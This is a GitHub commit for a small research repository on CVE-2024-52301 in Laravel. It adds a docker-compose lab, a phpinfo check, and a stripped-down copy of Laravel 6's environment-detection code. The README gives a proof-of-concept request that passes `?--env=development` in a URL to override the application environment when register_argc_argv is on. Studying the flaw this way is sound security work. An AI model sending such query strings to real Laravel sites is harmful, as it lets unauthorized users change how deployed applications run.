initial

martinhaunschmid · Nov 15, 2024 · 4a00f0a · 4a00f0a
1 parent 07afab1
commit 4a00f0a
Show file tree

Hide file tree

Showing 4 changed files with 79 additions and 1 deletion.
diff --git a/README.md b/README.md
@@ -1,2 +1,25 @@
 # CVE-2024-52301-Research
-A bit of research around CVE-2024-52301
+A bit of research around CVE-2024-52301. I've seen the vuln and wanted to find out how Laravel is vulnerable. For this, I just diffed the 6.20.44 and 6.20.45 versions, and traced how GET parameters could end up changing the application configuration.
+
+I've written about this on X and BlueSky:
+- https://x.com/0xntrm/status/1857504510609965206
+- https://bsky.app/profile/ntrm.bsky.social/post/3laz4tkds2k2m
+
+# Contents
+
+This repo contains a simple docker compose file and some php:
+- phpinfo.php to check, whether the `register_argc_argv` is on or off
+- exploit.php contains the relevant methods from Laravel version 6, stripped from dependencies and unnecessary stuff
+
+# Run the thing
+
+```bash
+docker-compose up -d
+
+curl localhost:8000/exploit.php?--env=development
+
+```
+
+# Sources
+https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-laravel-framework-updates-verfugbar
+https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-millions-of-web-applications-to-attack/
diff --git a/app/exploit.php b/app/exploit.php
@@ -0,0 +1,38 @@
+<?php
+
+function detectEnvironment($callback = null) {
+    $args = $_SERVER['argv'] ?? null;
+    return detect(null, $args);
+}
+
+function detect($callback, $consoleArgs = null) {
+    if ($consoleArgs) {
+        return detectConsoleEnvironment($callback, $consoleArgs);
+    }
+    return "NOT ENTERING EXPLOIT PATH";
+}
+
+function detectConsoleEnvironment($callback, array $args) {
+    // First we will check if an environment argument was passed via console arguments
+    // and if it was that automatically overrides as the environment. Otherwise, we
+    // will check the environment as a "web" request like a typical HTTP request.
+    if (! is_null($value = getEnvironmentArgument($args))) {
+        return $value;
+    }
+    return "NOT ENTERING EXPLOIT PATH";
+}
+
+function getEnvironmentArgument(array $args) {
+    foreach ($args as $i => $value) {
+        if ($value === '--env') {
+            return $args[$i + 1] ?? null;
+        }
+
+        if (str_starts_with($value, '--env')) {
+            return array_slice(explode('=', $value), 1)[0];
+        }
+    }
+}
+
+$result = detectEnvironment();
+var_dump($result);
diff --git a/app/phpinfo.php b/app/phpinfo.php
@@ -0,0 +1,3 @@
+<?php
+
+phpinfo();
diff --git a/docker-compose.yml b/docker-compose.yml
@@ -0,0 +1,14 @@
+services:
+  php-app:
+    image: php:8.1-cli
+    container_name: php-app
+    working_dir: /var/www/html
+    volumes:
+      - ./app:/var/www/html:rw
+    ports:
+      - "8000:8000"
+    command: >
+      sh -c "
+      echo 'register_argc_argv = On' >> /usr/local/etc/php/conf.d/custom.ini &&
+      php -S 0.0.0.0:8000
+      "